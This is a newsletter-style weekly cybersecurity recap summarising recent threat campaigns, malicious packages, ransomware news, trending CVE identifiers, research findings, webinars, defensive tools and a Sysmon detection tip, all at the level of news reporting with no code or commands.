SunsetHost Weekly Tech News

This week in cybersecurity, the landscape continues to evolve at a rapid pace. From sophisticated nation-state campaigns to sneaky malware hiding in plain sight, the threat landscape serves as a reminder that attackers are constantly adapting. Advanced threat groups are targeting outdated hardware, leveraging legitimate tools for financial fraud, and finding increasingly creative ways to bypass security measures. Supply chain threats are on the rise, with open-source repositories being exploited for credential theft and hidden backdoors.

On a more positive note, law enforcement is ramping up efforts against cybercriminal networks, with key ransomware figures facing extradition and the cybersecurity community making strides in uncovering and dismantling active threats. Ethical hackers remain at the forefront of exposing critical vulnerabilities, and new decryptors are providing victims with a glimmer of hope against ransomware operators.

In this week’s recap, we cover the latest attack methods, emerging vulnerabilities, and defensive strategies that will help you stay one step ahead. Stay informed, stay secure.

---

Threat of the Week
UNC3886 Targets End-of-Life Juniper Networks MX Series Routers
The China-linked hacking group UNC3886 has targeted end-of-life Juniper Networks MX Series routers in a campaign involving six distinct TinyShell-based backdoors. Fewer than 10 organizations have been affected by this attack. The backdoors have varied custom capabilities, including both active and passive functions, and feature embedded scripts that disable logging on the compromised devices. Juniper Networks has confirmed that the vulnerability CVE-2025-21590 was exploited, enabling attackers to bypass security defenses and execute malicious code.

AWS Cloud Visibility Best Practices
You can’t secure what you can’t see.
In the ever-complex AWS environment, a lack of visibility can drown you in alerts, making it difficult to distinguish critical issues. Learn how to enhance your AWS security by gaining clear visibility and prioritizing risks more effectively.

[Get the guide ➝]

---

Top News

Storm-1865 Uses ClickFix for Financial Fraud and Theft
Storm-1865, a well-known threat actor, has been observed using the ClickFix phishing technique to launch a campaign involving Booking.com lures that deliver credential-stealing malware. Active since December 2024, this campaign spans North America, Oceania, Southeast Asia, and Europe.

North Korea Targets Korean and English-Speaking Users with KoSpy
The North Korea-linked ScarCruft group has uploaded fraudulent Android apps to the Google Play Store. These seemingly harmless utilities, when installed, deploy the KoSpy malware, which can collect SMS messages, call logs, location data, files, audio, and screenshots. The malware’s earliest versions date back to March 2022, though the scale of the campaign remains unclear.

SideWinder Targets Maritime and Logistics Companies
The APT group SideWinder has been linked to attacks on maritime and logistics companies across South and Southeast Asia, the Middle East, and Africa. The group utilizes the StealerBot toolkit to extract sensitive data from compromised hosts.

LockBit Developer Extradited to the U.S.
Rostislav Panev, a dual Russian-Israeli national, has been extradited from Israel to face charges related to his involvement as a developer for the LockBit ransomware group. Panev allegedly earned around $230,000 between 2022 and 2024 before his arrest in August 2024.

Malicious PyPI Packages Conduct Credential Theft
A series of 20 malicious packages found on the Python Package Index (PyPI) repository masqueraded as time and cloud-related utilities but contained hidden functionality to steal sensitive data, including cloud access tokens. The packages were downloaded over 14,100 times before being removed, with three particularly noteworthy packages being dependencies in a popular GitHub project.

---

Trending CVEs
Software vulnerabilities remain a favored entry point for attackers, and this week’s list highlights critical flaws you should prioritize. Delaying patching can turn a minor vulnerability into a major breach, so stay on top of these critical updates.

This week’s critical vulnerabilities include:

• CVE-2025-24983, CVE-2025-24984, CVE-2025-24985, CVE-2025-24991, CVE-2025-24993, CVE-2025-26633 (Microsoft Windows)
• CVE-2025-24201 (Apple iOS, iPadOS, macOS Sequoia, Safari, and VisionOS)
• CVE-2025-25291, CVE-2025-25292 (ruby-saml)
• CVE-2025-27363 (FreeType)
• CVE-2024-12297 (Moxa PT switches)
• CVE-2025-27816 (Arctera InfoScale product)
• CVE-2025-24813 (Apache Tomcat)
• CVE-2025-27636 (Apache Camel)
• CVE-2025-27017 (Apache NiFi)
• CVE-2024-56336 (Siemens SINAMICS S200)
• CVE-2024-13871, CVE-2024-13872 (Bitdefender BOX v1)
• CVE-2025-20115 (Cisco IOS XR)
• CVE-2025-27593 (SICK DL100-2xxxxxxx)
• CVE-2025-27407 (graphql)
• CVE-2024-54085 (AMI)
• CVE-2025-27509 (Fleet)
• CVE-2024-57040 (TP-Link TL-WR845N router)

Stay proactive with your patching to avoid the fallout from these vulnerabilities.

Around the Cyber World

Google Pays $11.8 Million in 2024 Bug Bounty Program
In 2024, Google awarded nearly $12 million to 660 security researchers who uncovered vulnerabilities through its Vulnerability Reward Program (VRP). A significant portion of this amount—over $3.3 million—was given to those who discovered critical flaws in Android and Google mobile applications. The company also highlighted that researchers submitted 185 bug reports related to its AI products, with rewards totaling over $140,000.

Security Flaws in ICONICS Suite Disclosed
Five high-severity vulnerabilities have been revealed in ICONICS Suite, a Supervisory Control and Data Acquisition (SCADA) system. The flaws—CVE-2024-1182, CVE-2024-7587, CVE-2024-8299, CVE-2024-9852, and CVE-2024-8300—could allow authenticated attackers to execute arbitrary code, escalate privileges, and manipulate vital files. If exploited in an industrial setting, these vulnerabilities pose serious risks to the confidentiality, integrity, and availability of the affected systems.

Threat Actors Intensify Abuse of Remote Access Tools
Cybercriminals, including groups such as TA583, TA2725, and UAC-0050, are increasingly misusing legitimate remote monitoring and management (RMM) tools like ScreenConnect, Fleetdeck, and Atera to execute attacks. These tools, often used for legitimate purposes, can be weaponized to collect data, facilitate financial theft, and deploy additional malware such as ransomware. The use of such tools evades traditional defenses, making detection more challenging.

Decryptor for Linux Variant of Akira Ransomware Released
A decryptor has been made available for the Linux/ESXi version of Akira ransomware. The tool, created by researcher Yohanes Nugroho, uses GPU power to retrieve the decryption key and unlock files, providing a free way for victims to recover their data.

Volt Typhoon Hackers Dwelled in a U.S. Electric Company for Over 300 Days
Chinese hackers linked to the Volt Typhoon campaign maintained a presence in a Massachusetts utility company’s systems for nearly a year. The attackers gained access via a vulnerable Fortinet 300D firewall associated with a managed service provider. Despite evidence of lateral movement and data exfiltration, the utility company reports that no sensitive customer data was compromised, and it successfully revamped its network architecture to thwart further attacks.

Lazarus Group Drops LazarLoader Malware
The North Korean-linked Lazarus Group has been observed targeting South Korean web servers to deploy LazarLoader, a malware downloader. This malware is used to install a backdoor that allows attackers to further compromise systems.

YouTube Becomes Conduit for DCRat
Cybercriminals are using YouTube to distribute Dark Crystal RAT (DCRat) malware. By uploading videos that promote gaming cheats and tools, attackers trick users into clicking malicious links in video descriptions. The malware, which has been active since 2018, offers functions like keystroke logging, webcam access, and password exfiltration.

New Social Engineering Campaigns Target Microsoft 365 Account Takeover
Two ongoing campaigns have been targeting Microsoft 365 users with advanced social engineering tactics. By leveraging OAuth redirection and brand impersonation, these campaigns aim to steal credentials and install malware. Three malicious OAuth apps—posing as Adobe Drive, Adobe Acrobat, and DocuSign—have been discovered redirecting users to phishing pages.

Wi-Fi Jamming Technique Enables Precision DoS Attack
A new research breakthrough reveals a sophisticated Wi-Fi jamming technique that can disrupt specific devices with millimeter-level precision. Using Reconfigurable Intelligent Surface (RIS) technology, attackers can manipulate wireless signals to block communications with targeted devices while leaving others unaffected.

Hash DoS Flaw in QUIC Implementations
Several Quick UDP Internet Connections (QUIC) protocol implementations are vulnerable to a hash-based Denial of Service (DoS) attack. This flaw allows attackers to slow down servers by forcing them to use significant computational resources to process malicious connection IDs.

Exposed Jupyter Notebooks Become Cryptominer Targets
New attacks have been targeting misconfigured Jupyter Notebooks on both Windows and Linux systems, deploying cryptocurrency miners. These attacks exploit vulnerabilities to install mining software aimed at Monero and other lesser-known cryptocurrencies.

ESP32 Chip Backdoor Claims Disputed
Espressif, the manufacturer of the ESP32 microcontroller, has disputed claims of a backdoor in its products. Researchers initially discovered undocumented commands in the chips that could potentially be exploited in supply chain attacks. Espressif clarified that these commands are for internal debugging purposes and will release a software fix to address the issue.

Switzerland Makes it Mandatory to Disclose Critical Infra Attacks
Starting April 1, 2025, critical infrastructure organizations in Switzerland will be required to report cyberattacks to the National Cyber Security Centre (NCSC) within 24 hours. Failure to report attacks could result in fines. This mandate includes incidents threatening the functionality of critical infrastructure or involving data manipulation, blackmail, or coercion.

Bugs in Microsoft’s Time Travel Debugging (TTD) Framework
Mandiant has identified security flaws in Microsoft’s Time Travel Debugging (TTD) framework, a tool used for debugging Windows user-mode applications. These flaws could allow attackers to bypass security analysis and go undetected, masking vulnerabilities that could be exploited. Microsoft has addressed the issues in TTD version 1.11.410.

NIST Chooses HQC as Fifth Post-Quantum Crypto Algorithm
NIST has selected HQC (Hamming Quasi-Cyclic) as a backup algorithm to counter the potential future threats posed by quantum computers. While ML-KEM is the primary defense, HQC will serve as a secondary line of defense to secure stored and transmitted data against quantum threats.

Going from BYOVD to BYOTB to BYOVE
A new attack vector, known as Bring Your Own Vulnerable Driver (BYOVD), is evolving. This technique exploits legitimate but vulnerable drivers to elevate privileges and perform malicious actions. Research has introduced variations of this attack, including Bring Your Own Trusted Binary (BYOTB) and Bring Your Own Vulnerable Enclave (BYOVE), which target trusted binaries and secure enclaves to evade detection and execute payloads stealthily.

Cybersecurity Webinars

Learn How to Eliminate Identity-Based Threats
Traditional security methods are increasingly ineffective against identity-based threats like phishing and MFA bypass. This webinar will discuss secure-by-design access solutions that offer phishing resistance, device compliance, and adaptive authentication, shifting security strategies from reactive to proactive.

Discover AI-Driven Threats and Zero Trust Defense Before It’s Too Late
Join Diana Shtil from Zscaler to explore how AI is reshaping cybersecurity and learn proactive strategies—including Zero Trust defense—to protect your organization from AI-driven attacks.

Your AI is Outpacing Your Security: Here’s How to Keep Up
Hidden AI tools are quietly spreading across environments, bypassing traditional security controls. Join Dvir Sasson, Director of Security Research at Reco, to uncover how to detect and respond to stealthy AI threats in your SaaS applications.

Cybersecurity Tools

CVE Prioritizer
Streamline vulnerability management with this advanced tool that integrates CVSS scores, EPSS predictive insights, CISA KEV, and VulnCheck’s enriched community data. It helps prioritize vulnerabilities that are most likely to be actively exploited, making patch management more efficient.

Fleet
Fleet is an open-source IT and security platform that simplifies vulnerability tracking, device health monitoring, and security policy management across macOS, Windows, Linux, cloud platforms, and IoT. It offers a modular, lightweight solution that integrates smoothly with other tools.

ZeroProbe
ZeroProbe is a specialized toolkit for security researchers and red teamers, designed for precise detection of kernel exploits, DLL hijacking, privilege escalation, and suspicious memory regions. It allows for stealthy, forensic-friendly assessments on Windows systems.

Tip of the Week

Detecting Threat Actors Early with Sysmon and Event ID 4688
Sysmon, combined with Windows Event ID 4688 (Process Creation), can significantly reduce the risk of compromise by detecting unusual or malicious processes early. Sysmon provides detailed logs on process activities, file creation, and network connections, enabling faster detection of threats. Use Sysmon with a trusted configuration and integrate it with free SIEM tools for real-time visibility.

Conclusion

The threat landscape continues to evolve at a rapid pace, with attackers leveraging new tactics, tools, and technologies to bypass security defenses. As organizations face increasingly sophisticated attacks, it’s critical to stay ahead of the curve by continuously adapting and fortifying defenses. Proactive strategies, a deeper understanding of attacker behavior, and staying informed about emerging threats are essential for maintaining robust security. Keep monitoring the shifting landscape, and remember: the best defense is always a step ahead. Stay proactive, stay skeptical, and stay secure